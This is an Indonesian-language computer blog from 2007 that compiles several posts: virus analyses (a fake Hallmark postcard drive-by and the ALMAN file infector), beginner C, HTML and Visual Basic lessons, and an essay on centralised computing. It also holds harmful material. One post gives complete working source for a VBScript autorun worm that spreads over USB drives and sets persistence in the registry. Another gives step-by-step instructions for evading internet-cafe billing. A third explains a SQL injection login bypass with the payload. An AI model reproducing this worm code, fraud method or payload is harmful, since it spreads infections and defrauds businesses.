Dalam papernya “The Ghost in The Browser”, team Google memberikan informasi yang sangat mengejutkan bahwa lebih dari 10 % website yang ada di internet mengandung malware yang ditujukan untuk menginfeksi pengunjung yang datang ke website tersebut. Dengan kata lain, setiap 10 website yang anda kunjungi ada 1 yang mengandung malware berbahaya yang siap menerkam saat anda mengunjungi website tersebut, sebagai contoh adalah website yang menawarkan konten pornografi dan website crack. Anda jangan lega dulu jika tidak suka dengan pornografi dan crack, karena website umum juga ternyata banyak yang mengandung malware dan penyebabnya adalah banner-banner pertukaran iklan pada website “lurus” tersebut ataupun website yang memang berhasil ditembus dan dikuasai oleh hacker jahat. Apakah hanya begitu saja ? Menunggu korban tidak berdosa datang ke website tentu tidak efektif dan harus ada umpannya. Bagaimana para pembuat virus menggiring korbannya untuk mengunjungi website ini sehingga menjadi korban Drive by Download ?

Jawabannya adalah perkembangan dari virus W32/Luder atau dikenal juga dengan nama W32/Drev. Jika virus Luder akan datang dengan lampiran “postcard.exe” pada email dan kemungkinan besar akan berhasil di blok oleh mailserver yang menolak lampiran, sudah lampiran, .exe lagi (ibarat manusia, dosanya bertumpuk tapi mau masuk surga, mana mungkin dikasih lewat :P). Namun virus yang baru ini tidak mengandung lampiran dan akan datang sebagai email biasa sehingga tentunya tidak ada yang bisa diblok oleh mailserver. (Lihat gambar 1)

Gambar 1, Email virus baru yang memanfaatkan fitur Drive by Download untuk menyebarkan dirinya

Tampilan Rekayasa Sosial yang canggih

Virus yang datang dalam lampiran postcard.exe sebenarnya merupakan varian baru dari Luder karena memiliki tampilan yang lebih canggih dan meyakinkan. Virus ini akan merekayasa dirinya seakan-akan anda mendapatkan kartu ucapan, sebagai contohnya adalah yang diterima Vaksincom “seakan-akan” ada kartu ucapan yang dikirimkan melalui Hallmark www.hallmark.com. Baik bagian pengirim “From” dipalsukan dari E-cards@hallmark.com dan tampilan body email juga sangat meyakinkan kecuali salah eja “recieved” yang harusnya “received” (yang dalam waktu singkat diperbaiki oleh pembuat virus pada varian berikutnya yang bahkan datang tanpa memanfaatkan tampilan logo macam-macam dan hanya plain text saja, dengan memalsukan email dari greetings.com, domain yang juga dimiliki oleh Hallmark). Selain itu, perbedaan utama adalah link untuk melihat kartu ucapan “To see it, click here” yang dipalsukan. Link tersebut tidak terlihat, kecuali di klik atau di lihat propertynya. Disini terlihat bahwa link tersebut mengarahkan download pada IP lain http://195.199.145.57 diluar hallmark dan jika link ini di klik, maka akan memicu download file dengan nama “postcard.exe” (lihat gambar 2).

Gambar 2, Link download kartu ucapan yang memicu download virus dengan nama file “postcard.exe”.
Guna memastikan bahwa Postcard.exe adalah virus, maka penulis melakukan scan dengan Norman Virus Control dan hasilnya adalah Norman Virus Control dengan teknologi Sandboxnya mampu mendeteksi file tersebut sebagai virus W32/Hidewindows.C.dropper. (lihat gambar 3)

Gambar 3, Norman mendeteksi file “postcard.exe” sebagai virus dengan nama W32/Hidewindows.C.dropper.

Dari penelusuran di atas, pembaca tentunya dapat mengambil kesimpulan bahwa para pembuat virus sekarang tidak kalah pintar dengan tentara Jerman yang dulu menyerang Perancis di tahun 1940. Daripada berhadapan langsung dengan pertahanan benteng Maginot yang sudah siap menghadapi serangan, Jerman memilih menyerang Perancis dari Belgia dan Belanda yang tidak memiliki benteng Maginot. Daripada repot-repot memikirkan cara menghadapi bloking lampiran oleh administrator mailserver sehingga efektivitas penyebaran virusnya menurun maka pembuat virus memilih untuk tidak mengirimkan virus melalui lampiran email, tetapi memanfaatkan email untuk mengarahkan penerimanya mendownload / menjalankan file virus dari browser (Drive by Download).

Virus ini perlu diwaspadai, dan terbukti pada Lebaran 2007 virus ini berusaha memanfaatkan event tersebut dengan mengirimkan dirinya seakan-akan kartu ucapan lebaran. Apalagi akhir tahun dimana pengiriman kartu ucapan mencapai tingkat tertinggi, maka virus ini akan mendapatkan momentum yang terbaik di bulan Desember 2007.

Salam,

Aa Tan

info@vaksin.com

PT. Vaksincom

Jl. Tanah Abang III / 19E

Jakarta 10160

Ph : 021 345 6850

Fx : 021 345 6851

Sabtu punya

2007-12-21T17:06:00.000-08:00

Mencurangi (hampir) Semua Jenis Billing Warnet
Oleh BLiZBS Uchiha
Published: Januari 10, 2007
Print
Artikel ini dibuat oleh seorang newbie dan lamer bernama Blizbs_Uchiha dan ditujukan oleh newbie2 laennya. Buat mas-mas dan om-om yang merasa udah merasa pinter ato udah tau caranya sangat disarankan untuk tidak usah membaca artikel ini karena hanya membuang2 waktu anda yang sangat berharga.

Cara ini saya dapetin pas kantong lagi kempes tapi nafsu online lagi tinggi
Setelah muter2 otak sebentar sambil tidur, akhirnya kutemukan cara buat ngakalin billing warnetnya buat ngirit ongkos online.
Kalau cara yang ada di X-Code Magz vol4 itu cuma bisa untuk Billing Explorer(memang bisa, saya sudah membuktikannya)
Cara ini berlaku untuk segala versi billing explorer dan kebanyakan aplikasi billing lainnya. Dan merupakan kelemahan semua billing warnet yang berbasis windows!!!

Penasaran mau tau caranya ? Baca aja sampai habis !
Skali lagi saya ingatkan buat anda yang merasa udah pinter diharapa ga usah baca, kecuali pengen mati kebosanan (niru kata-kata siapa ya?

Ini dia caranya ...
Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat windows dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login melalui program billing itu.
Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu. Naah... udah tau apa yang bakal saya jelasin ? Kalo udah tau, brenti aja bacanya. Daripada mati kebosanan

Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu tanpa perlu login. Ada banyak progie buat nyembunyiin window, salah satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan progie laen silakan baca manualnya, tapi yang perlu diperhatikan adalah progie yang anda gunakan harus bisa show/hide window pake hotkey coz windows kita kan ditutupi sama login screen sialan itu.

Yang harus disiapkan:
1. Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, ga sampe setengah isi disket.
Aku nemunya pas smp tapi baru sekarang kepake ^^
2. Muka bego
3. Mental yang kuat

Langkah-langkahnya:

01. Masuk warnet dan pasang muka bego biar ga dicurigai operator
02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai juga sih.
03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak.
04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.
05. Saat masuk login screen, login aja seperti biasa.
06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google.
07. Setelah ZHider dijalankan langsung aja logout.
08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!
09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login.
10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang menghilang entah kemana
11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.
12. Logout. SIapkan muka bego, lalu bayar tarif.

Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran.

Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider

CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.

Kalo cara di atas ga bisa dilakuin, hentikanlah usahamu. Sesungguhnya perbuatan jahatmu tidak diridhai Tuhan
Kalo ketahuan langsung pertebal "muka bego"-mu. Misalnya bilang "Eh, kok jadi gini ya? Kemaren ga gini kok." Ato kata-kata lain, tergantung kreatifitas anda.

Penulis tidak bertanggung jawab atas kerugian yang ditimbulkan atas penggunaan artikel ini (Use at Your Own Risk).

Thanx to: ~ Allah swt ~ #yogyafree ~ #jasakom ~ #antihackerlink ~ W1ga5 ~ Blue Spy ~ And all X-Code crew ~

Contact me:
Yahoo ID : blizbs_3690
Frendzta' : www.friendster.com/blizbs3690

Kamis punya

2007-12-21T17:02:00.001-08:00

Membuat dan Menghapus Virus Autorun tanpa Antivirus
Oleh 7up3r1
Published: Desember 12, 2007
Print
Artikel ini berguna untuk melengkapi artikel sebelumnya, bahan yang digunakan sebagai sampel virus ini yaitu virus dengan nama k4l0n6 yang telah menginfeksi PC gw.

Adapun cara membuat virus autorun sebagai berikut

1. script coding pertama

[autorun]
shellexecute=wscript.exe k4l0n6.sys.vbs

simpan coding tersebut dengan nama dan ekstensi file “autorun.inf” (tanpa tanda petik)

2. script coding kedua
'Kalong-X2
'Varian dari Kalong.VBS
on error resume next

'Dim kata-kata berikut
dim rekur,syspath,windowpath,desades,longka,mf,isi,tf,kalong,nt,check,sd

'siapkan isi autorun
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe k4l0n6.sys.vbs"
set longka = createobject("Scripting.FileSystemObject")
set mf = longka.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

'buat file induk
Set windowpath = longka.getspecialfolder(0)
Set syspath = longka.getspecialfolder(1)
set tf = longka.getfile(syspath & "\recycle.vbs")
tf.attributes = 32
set tf = longka.createtextfile(syspath & "\recycle.vbs",2,true)
tf.write rekur
tf.close
set tf = longka.getfile(syspath & "\recycle.vbs")
tf.attributes = 39

'sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in longka.drives

If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then

set tf=longka.getfile(desades.path &"\k4l0n6.sys.vbs")
tf.attributes =32
set tf=longka.createtextfile(desades.path &"\k4l0n6.sys.vbs",2,true)
tf.write rekur
tf.close
set tf=longka.getfile(desades.path &"\k4l0n6.sys.vbs")
tf.attributes = 39

set tf =longka.getfile(desades.path &"\autorun.inf")
tf.attributes = 32
set tf=longka.createtextfile(desades.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = longka.getfile(desades.path &"\autorun.inf")
tf.attributes=39
end if
next

'Manipulasi Registry
set kalong = createobject("WScript.Shell")

'Ubah IE Title
kalong.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: X2 ATTACK ::"

'Ubah tulisan pertama pada text box menu RUN
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a", "KALONG-X2/1"
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList", "a"

'Buat pesan saat Windows Startup
kalong.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "KALONG-X2"
kalong.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "Komputer Anda Diambil Alih"

'Aktifkan saat Windows Startup
kalong.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia", syspath & "\recycle.vbs"

'Ubah Default Start Page Internet Explorer
kalong.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.vaksin.com"

'Bonus
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname

simpan coding tersebut dengan nama dan ekstensi file “k4l0n6.sys.vbs” (tanpa tanda petik)

secara otomatis virus tersebut akan menyebar melalui flashdisk dan menginfeksi komputer yang kita gunakan. Untuk mengetahui komputer terkena virus autorun dapat menggunakan software iKnowPS sehingga akan terlihat frekuensi tampilan kerja komputer yang terlihat sangat sibuk.

Adapun cara menanggulangi virus tersebut yaitu dengan cara

- tekan menu Tools > Folder Options… > View > unchek Hide Protected operating system files (Recommended) > yes > OK

- sehingga secara otomatis akan terlihat tampilan file virus yang terhidden tersebut

- langkah selanjutnya yaitu dengan cara membuka dan mempelajari script coding file virus tersebut. Dan mempelajari bagian-bagian mana saja yang settingannya dirubah, terutama pada register editor (menu run > ketik regedit > OK)

- setelah itu, file tersebut dihapus/di delete dari komputer

semoga tulisan ini, bisa bermanfaat dan berguna untuk semua orang.

Thank’s

7up3r1@gmail.com

LESSON I

2007-12-21T16:51:00.000-08:00

PEMROGRAMAN BERBASIS C
Dibuat ileh : Jack
bahasa : C (lebih fokusnya pada C++)
Program : Bisa menggunakan visual C++, borland C++, ataw yang menurut saya paling baik, Dev C++ (fiturnya termasuk lengkap, dan open source)
Download : http://ftp1.sourceforge.net/dev-cpp/devcpp4.zip <-- Dev C versi 4
Link resource : http://www.bloodshed.net/dev/

Sebelum masuk ke dalam lebih lanjut, gwa bakal mulai dengan pengenalan program C. Program C memiliki suatu ketentuan (kerangka) yang sudah ditetapkan dari awal. Kerangka itu berfungsi untuk memudahkan kita "membaca" dan mengerti program tersebut.
#include
int main()
{ printf("Hallo HPS mania\n");
system("pause");
return 0;
}
#include bagian kepala dari program, maksud dari tulisan diatas ialah program yang kita gunakan menggunakan resource stdio (stdio merupakan standar format dalam C, berupa perintah-perintah yang biasa dipakai dalam C seperti printf, scanf, dll)
int main()
{ printf("Hallo HPS mania\n");
system("pause");
return 0;
}Bagian dalam/tubuh program, yang apabila kita bedah lagi sebagai berikut
int main()
{
}Kerangka tubuh program, semua perintah pada program kita masukkan disini, untuk lebih lanjut terdapat fungsi dan prosedur yang berguna untuk menyendirikan suatu aktivitas yang dikerjakan program tersebut.
printf("Hallo HPS mania\n");
Perintah standar pada C, printf digunakan untuk menampilkan tulisan pada layar. Tulisan yang ditampilkan yaitu Hallo HPS mania. Fungsi "/n" memiliki maksud enter, atau turun satu baris.
system("pause");
return 0;return 0; <--- perintah mengakhiri program, tetapi apabila kita hanya mengunakan return 0; saja, program akan langsung terbuka dan terhenti (windowsnya keluar sendiri). Sehingga kita memerlukan perintah system("pause"); agar kita dapat membaca isi dari program tersebut.
Note : Setelah kita membuat sebuah baris program, kita harus meng-compile program tersebut sehingga berbentuk executable program (.exe). Caranya ialah pilih menu Execute, lalu pilih compile. Atau dengan shortcut key F9

o,ya saya menyarankan kalau pembaca memakai dev C. Saya sendiri adalah seorang programmer yang biasa mengunakan C ++

HTML & WEB

2007-12-20T17:55:00.000-08:00

HTML & WEB
Dibuat Oleh : Temennya Alex yang situsnya sering dibobol( Ani )

Tak kenal maka tak sayang, maka saya memperkenalkan diri terlebih dahulu nama saya ani semester 3 disalah satu perguruan tinggi di jakarta, pekerjaan saya seorang pembuat web . Sebelum saya melanjutkan saya ingin bertanya apakah anda ingin menjadi seorang programmer HTML ? Jika ya silakan anda membaca tulisan ini lebih lanjut, bagi yang sekedar ingin tahu lanjutkan membacanya. Kalau anda memang mau menjadi programer HTML berarti anda harus berhadapan dengan HTML. HTML adalah Hypertext Markup Language. Kenapa saya sendiri suka kepada HTML adalah salah satu bahasa yang lebih sederhana dibandingkan bahasa pemrograman komputer lainnya, seperti C atau visual basic. Belajar HTML sangatlah menyenangkan.Anda melalui bab ini akan diajarkan membuat halaman web yang paling dasar. Pembuatan halaman web ini dimulai dengan yang paling dasar dengan mengunakan sebuah editor yang namanya notepad.Beberapa hal yang perlu diingaty adalah setiap penulisan HTML dimulai dan diakhir sebagai contoh lihatlah gambar dibawah ini

lalu savelah dengan nama 1.html.Maka ketika kita mengklik dua kali maka kita akan melihat halaman web dengan tulisan rose are red bla....,bla.....Jika kita ingin tulisan kita menjadi tebal tambahkan huruf b dapat dilihat contoh dibawah ini

semua yang kita pelajari hari semua termasuk kedalam Tag pembuka dan tag penutup minggu depan kita akan mempelajari Tag perintah pemformatan

Sql Injection

2007-12-20T16:17:00.000-08:00

SQL INJECTION
Oleh : Vbbego
Disadur dari:
Seni Internet Hacking
Teknik Hacking untuk Pemula
Hack

Mungkin kita sering menonton film anak-anak, terutama donal bebek, tapi pernahkah kita perhatikan bahwa Donal sering melakukan Sql injection. Coba perhatikan cerita ini Donal melihat sebuah pengumuan yang ditempel,”Dilarang masuk” diruangan paman Gober. Apa yang dilakukan Donal ? Donal menambahkan kata “Kecuali Donal” pada pengumuman tersebut,sehingga ia bisa masuk dan meminjam uang pada paman Gober. Dalam cerita diatas penambahan kata “kecuali Donal” adalah salah satu contoh Sql Injection.Tetapi sebelum kita membahas Sql Injection kita wajib mengetahui apa yang dimaksud dengan Sql.Sql adalah suatu bahasa yang digunakan untuk mendapatkan atau merubah data yang ada didalam relational database, Salah satu contoh statement sql sederhana yang akan mengambil record nama dari table murid adalah sebagai berikut select nama from murid. Bagaimana caranya kita bisa login tanpa mengetahui username dan password. Saya akan memberi contoh kepada anda serta tentu saja teknik manipulasinya sehingga anda bisa melewati proses login tanpa perlu mengetahui username dan password. Hal yang umum dipakai orang untuk mencocokan user yang login, maka digunakan statement sql sebagai berikut : select * from tbl_user where field_username=input_username and field_password=input_password, jadi ketika kita login terjadi pengecekan apakah user dan password saya benar atau tidak, jika memang terdapat record dengan username nama saya dan password sama dengan password saya maka otomatis sql akan mengembalikan satu record yang berarti kita bisa masuk sebaliknya jika salah kita dianggap gagal. Lalu bagaimana kalau kita merubah isian pada username dengan 'or”=' pada kolom user name dan 'or”=' pada kolom password maka yang dilakukan sql adalah sebagai berikut Operasi logika or yang dimasukan telah menyebabkan perintah sql akan selalu menghasilkan nilai True(Benar). Program telah mengijinkan kita masuk dan dianggap sebagai user yang sah. Lalu sebagai siapa kita? Kita akan menjadi user yang paling atas dari data tersebut biasanya sih administrator.Sangat mudah bukan, oleh karena itu saya hanya ingin mengingatkan bagi pembuat program tolong dibatasi input masuk user atau password kalau bisa jangan dibiarkan user memakai karakter yang special seperti % dan lain-lain. Jangan lewatkan selasa depan yah saya akan mengajarkan bagaimana kita menjadi orang lain.

Visual Basic

2007-12-16T16:27:00.000-08:00

Visual Basic
Senin, 17 Desember 2007
Oleh :Z

Kenapa saya membantu temen saya yang mempunyai nick vbbego, karena saya ingin berterima kasih kepada beliau yang menjelaskan visual basic dengan bahasa yang sangat sederhana dan mudah dimengerti. Mungkin lebih baik saya memulai dari awal saya belajar visual basic. Pertama kali saya minta diajarkan visual basic saya mendapatkan pengalaman yang tidak enak. Saya bertanya apa sih visual basic itu ? Saya engga pernah mendapatkan jawabnya banyak yang bilang visual basic adalah bla..bla..bla.... Hingga saya tertarik dengan sebuah nick vbbego. Lalu saya bertanya hal yang sama. Jawaban vbbego percuma saya bicara panjang lebar tentang visual basic bagaimana kalau langsung dipraktekan saja. Modal pertama kamu harus menginstall terlebih dahulu Visual Basic. Mendapatkan jawaban yang unik maka saya pun mencoba menginstall Visual Basic, alhasil saat ini saya bekerja sebagai programmer di salah satu perusahaan yang sedang berkembang yang ingin meninggalkan program under dos ke visual.Artikel saya ini hanya ulangan apa yang pernah diajar vbbego kepada saya ,semoga bisa berguna bagi temen-temen semua. Saya harap kalian sudah menginstall visual basicnya yah. Pertama kali kita membuka program Visual basic maka akan tampil gambar seperti dibawah ini

ToolBox disini kita dapat mengambil tools apa saja yang kita gunakan dan ditaruh di Form, Jadi form yang pengertiannya untuk saat ini adalah tempat untk menaruh kontrol-kontrol yang dalam visual basic, tool properti yang digunakan untuk mengacak-ngacak kontrol yang disediakan Visual basic.explor vb sebabnya kata vbbego disinilah kita dapat melihat apa yang kita telah buat.Mulai bingung yah dari pada makin bingung kita mulai saja coba-cobanya, supaya seragam coba deh tiru form dibawah ini :

O ya supaya sama dengan gambar ketika buat label, captionnya diganti jadi Nilai A, pas command buttonnya juga sama, kalau sudah klik dua kali command buttonnya sehingga isinya seperti ini
Private Sub Command1_Click()
Text1.Text = Val(Text1.Text) + Val(Text2.Text)
End Sub
Private artinya blok,_clik dilakukan pas tombol diklik
text1 diisi jumlah dari text1 ditambah text2
blok selesai.
Setelah semua itu selesai, saya bertanya sama vbbego jadi vb adalah aplikasi yang bisa membuat apa yang manusia mau dengan bantuan form dan tool box yang isinya bisa diacak-acak oleh properti yah, Vbbego menjawab sekarang anda menerangkan seperti orang mahir vb

Teknologi Maju Kembali Ke Teknologi Purbakala

2007-12-13T16:52:00.001-08:00

Teknologi Maju Kembali Ke Teknologi Purbakala
Oleh S'to
Published: September 21, 2007
Print

Saya pernah melihat sebuah lelucon, ceritanya waktu itu adalah masa depan dengan semua teknologi yang serba modern. Seorang perempuan mengunjungi museum yang melihat perkembangan mode dari jaman ke jaman. Pertama kali dia melihat seorang manusia dengan jenis pakaian ala kadarnya dan hanya menutupi bagian tubuh yang penting dengan sangat minim, kemudian perkembangan selanjutnya pakaian mulai dikenal dengan pakaian lengkap, rok mini, dan seterusnya sampai mode terakhir adalah manusia dengan pakaian minim seperti dulu kala. Ini mungkin hanya lelucon atau sekedar sindiran bahwa kita tidak menyadari apa yang sebenarnya kita mau sampai kita kembali lagi ke asal.

Teknologi bisa juga terjadi seperti halnya mode pakaian berkembang dari jaman ke jaman toh akhirnya kembali lagi ke asal. Di era awal perkembangan komputer digunakan mini dan mainframe dimana semua pemrosesan adalah terpusat. Pada client hanyalah berupa monitor dan keyboard atau terminal yang tidak mempunyai alat pemrosesan apapun. Semua perintah dikirim dan di proses secara terpusat sehingga komputer pusat haruslah merupakan sebuah komputer yang cukup canggih dan cepat untuk melayani client yang terhubung.

Perkembangan selanjutnya, yang membuat perubahan yang sangat radikal adalah dikenalkannya personal komputer atau PC. Dengan munculnya PC dikenallah apa yang dinamakan sebagai smart client yaitu komputer yang mempunyai prosesor dan berbagai jenis aksesorisnya. Perkembangan PC inipun berkembang terus dan mendapatkan dukungan luas dari para pembuat PC dimana akhirnya kita mengenal konsep two tier, three tier dll dimana beban aplikasi dibagi ke dalam lapisan-lapisan sehingga tidak terbeban pada satu komputer.

Perkembangan PC akhirnya semakin berkembang demikian juga dengan software pendukungnya dimana semakin hari semakin banyak variasi yang ada. Akhirnya kesulitanpun mulai muncul, seiring dengan perkembangan PC yang sedemikian cepatnya sehingga tidaklah mengherankan jika dalam satu kantor terdapat 200 PC bertebaran dimana-mana. Angka 200 tidaklah besar dan menjadi ukuran yang lumrah di kantor-kantor.

Teknologi baru ternyata juga banyak menimbulkan masalah-masalah baru yang mulai tidak terpecahkan. Standarisasi software misalnya, dimana satu komputer menggunakan office 2000 sedangkan komputer yang lain menggunakan office xp sehingga menimbulkan masalah kompabilitas aplikasi. Demikian juga halnya ketika ingin melakukan standarisasi software atau melakukan update, upgrade dll ke dua ratus komputer bukanlah pekerjaan yang mudah. Belum lagi pengguna yang complain sehingga membutuhkan support dari bagian IT yang cukup tinggi. Selain itu, pekerjaan mengupgrade hardware PC, mengganti PC lama ke PC baru semakin banyak terjadi sehingga menimbulkan biaya tinggi.

Masalah-masalah seperti ini tidak pernah ditemukan ketika menggunakan mini dan mainframe yang terpusat. Akhirnya perkembangan selanjutnya pelan-pelan kembali lagi ke teknologi lama yang terpusat. Citrix yang mengenalkan software terpusat mendapatkan respon yang sangat baik ketika diperkenalkan dimana PC akan menjadi dump terminal yang akan mengambil tampilan, aplikasi dll pada komputer server. Tentu saja server yang digunakan haruslah mempunyai hardware yang cukup besar untuk melayani jumlah pengguna seperti halnya mini dan mainframe.
Selain Citrix, kita juga mengenal Terminal Services dengan prinsip kerja yang sama. Komputerisasi terpusat semacam ini sudah digabungkan ke dalam sistem operasi Windows Server seperti Windows Server 2000 dan Windows Server 2003 serta tentu saja Windows Server 2008. Jadi apakah ini termasuk teknologi baru ataukah teknologi lama dengan gaya baru ?

How We Teach You

2007-12-13T16:37:00.000-08:00

How We Teach You atau Bagaimana kita mengajar ? Ini yang menjadi perdebatan yang panjang. Karena kita tidak pernah tahu apakah pembaca seorang programer atau seorang user biasa yang belom mengerti programing, maka kami memutuskan untuk menjalankannya dengan teknik dasar yang dikombinasikan dengan aplikasi yang berguna dalam kehidupan nyata. Dan yang perlu diingat kita akan menjelaskan apa adanya apabila dalam aplikasi itu ada virusnya yah kita kasih tahu. Well Team kami mengucapkan selamat belajar di dunia Blog. Ini pertama kalinya ada blog yang mengajarkan Ilmu komputer. Sepengetahuan saya sih belom ada blog yang dipakai untuk mengajar.Hiduplah Ilmu pengetahuan dan teknologi Indonesia, kelak temen-temen bisa menjadi kami yang kedua. Karena kita team setiap orang akan menuliskan namanya diakhir artikel yang dia tulis. Well rasanya itu saya.

Bingung

2007-12-13T16:15:00.001-08:00

Setelah diputuskan akan mengajar programing dan web ternyata banyak masalah.Diantaranya bagaimana kita mengetahui kalau anda mengerti, Pembaca yang macam apa yang mau diajarkan, apa imbas baliknya bagi kita ? belom lagi blog belum bisa digunakan untuk menulis code HTML. Stres nih apa kemarin kita diskusi hanya dengan otot yah, sehingga sudah diputuskan masih banyak saja masalah yang mesti kita hadapi. Lalu apakah itu tanda blog ini akan berakhir ? Tentu saja tidak,lalu bagaimana kita menjawab tantangan ini.Anda bisa melihatnya dari hari senin dan tidak lupa dengan gaya yang santai dan berusaha tidak mirip dengan buku. Tokoh-tokoh yang pernah saya angkat akan membantu menulis dalam blog ini. Toni teman saya itu akan menulis tentang sekuriti 1 dan 2,saya akan menulis programan non visual, Mahasiswi semester 3 yang situsnya sering dibobol akan mengajarkan HTMl.Blog ini juga akan menampilkan artikel yang ditulis orang lain seperti contoh bonus minggu ini, jangan takut setiap artikel yang masuk akan ditampilkan apa adanya tidak memakai editing nama penulis ditulis dibawah. Jika teman-teman yang mempunyai informasi tentang Komputer dapat mengirim email ke saya di willy@bundamulia.ac.id.Untuk sub yang tidak disebutkan akan digarap bersama teman-teman saya yang lain.

Bonus Minggu Ini

2007-12-13T16:07:00.000-08:00

ALMAN, Virus Yang Doyan Makan File EXE
Oleh eL!t!zT
Published: Desember 12, 2007
Print

Teknik pertahanan virus dengan membuat file induk berekstensi exe, com, ataupun scr di drive system saat ini sudah mulai kehilangan popularitas alias sudah ketinggalan zaman. Pasalnya, trik yang banyak digunakan oleh virus-virus lokal ini sudah sedemikian lumrah, mudah dikenali dan dijinakkan. Cukup dengan memakai windows task manager saja atau pake tools lain semisal ProcessExplorer, System Task Manager, ProcLister, IceSwords dan semacamnya kita dapat dengan mudah mengenali file induk yang dibuat oleh virus lalu mematikan proses atau bahkan menghapus filenya sekalian. Sebutlah sederetan virus lokal seperti brontok, kangen, decoil, Mr. CoolFace, Wayang, Blue Fantasy, dan Moon Light ternyata masih mengusung teknik seperti itu.

Selangkah lebih maju, kspoold bersaudara muncul mengusung teknik yang lebih cerdas dengan cara membuat file avmeter32.dll atau avwav32.dll di direktori system yang akan menginjeksi file explorer.exe. Namun demikian, kehadiran kspoold di komputer kita dengan segera dapat disadari selain karena aksinya merubah file doc dan xls menjadi exe di flash disk (varian barunya katanya merubah seluruh file doc di komputer menjadi bmp) juga karena virus ini masih menulis sebuah file bernama kspoold.exe di direktori system yang dapat dilihat melalui task manager.

Sekitar 1 bulan kemarin saya menemukan sebuah virus baru (mungkin juga ini virus lama, tetapi saya baru menemukannya) yang saya juga tidak tahu apakah virus tersebut made in Indonesia atau bukan, tetapi yang jelasnya virus ini hadir dengan teknik penyamaran yang lebih baik lagi.

Virus yang dikenali dengan nama ALMAN oleh AVG dan Kaspersky ini terbilang cukup unik karena selain kemampuannya menginfeksi file exe, file induk yang dibuatnya cukup sulit dilacak karena bukan berupa file executable tetapi file berekstensi dll sehingga aktivitasnya tidak akan tampak jika dilihat melalui jendela task manager.

Aksi sang virus
Jika menginfeksi system, virus alman akan membuat 2 file di direktori system yakni wmdrtc32.dll dan wmdrtc32.dl_. File wmdrtc32.dll dibuat dengan ukuran sekitar 40 KB, diset beratribut normal. File ini ditugaskan untuk menginjeksi file explorer.exe miliknya windows setiap kali dijalankan. Ini saya ketahui setelah mengintipnya dengan tools gratisan a-squared HijackFree yang sebenarnya juga sedang terinfeksi. Ternyata file wmdrtc32.dll terdaftar sebagai salah satu module yang sedang digunakan oleh file explorer.exe. Demikian halnya file-file executable lain yang telah terinfeksi ketika dieksekusi akan menggunakan file tersebut sebagai salah satu modulnya. Ini mirip dengan aksi yang dilakukan oleh file avmeter32.dll atau avwav32.dll milik virus kspoold. Selanjutnya file wmdrtc32.dl_ berukuran sekitar 26,5 KB dan diset beratribut system dan hidden. Disinilah terlihat kelihaian teknik social engineeringnya karena jika dilihat sepintas lalu, file wmdrtc32.dl_ seolah-olah merupakan file milik windows yang telah direname oleh virus dan digantikan dengan file lain dengan ukuran berbeda. Dengan demikian, kita dapat terkecoh hanya menghapus file wmdrtc32.dll (40 KB) kemudian mengembalikan ekstensi dll pada file wmdrtc32.dl_ (26,5 KB) karena mengira itu filenya windows.
Mengenali file yang terinfeksi

Sebenarnya cukup sulit untuk mengenali file exe yang telah diinfeksi oleh virus ini hanya dengan melihatnya saja. Hal ini disebabkan karena sebagian besar file yang diinfeksinya tetap dapat berjalan dengan normal kecuali beberapa file seperti PCMAV-CLN.exe dan PCMAV-RTP (keduanya antivirus buatan PC Media) yang pernah saya temui.

